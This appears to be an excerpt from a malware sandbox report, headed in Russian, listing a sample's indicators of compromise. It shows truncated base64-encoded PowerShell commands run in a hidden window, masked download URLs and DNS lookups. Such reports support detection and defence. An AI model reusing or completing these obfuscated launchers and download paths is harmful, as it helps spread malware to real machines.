Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAEsAVQBYAFYAcwB5AHQAPQAnAFcATgBRAFoAWgBiAGEAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwB1AFIAYABpAGAAVABZAFAAcgBvAGAAVABgAE8AQwBgAE8AbAAiAC...
- http://gi###table.com/qytjn/yjxc_5x_3w/
- http://de##.#ihongobd.com/wp-admin/2h13l_xv_q92zm72mil/
- DNS ASK ca##jess.vn
- DNS ASK gi###table.com
- DNS ASK ey##en.es
- DNS ASK in#####si.ndrotech.com
- DNS ASK de##.#ihongobd.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAEsAVQBYAFYAcwB5AHQAPQAnAFcATgBRAFoAWgBiAGEAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwB1AFIAYABpAGAAVABZAFAAcgBvAGAAVABgAE8AQwBgAE8AbAAiAC...' (со скрытым окном)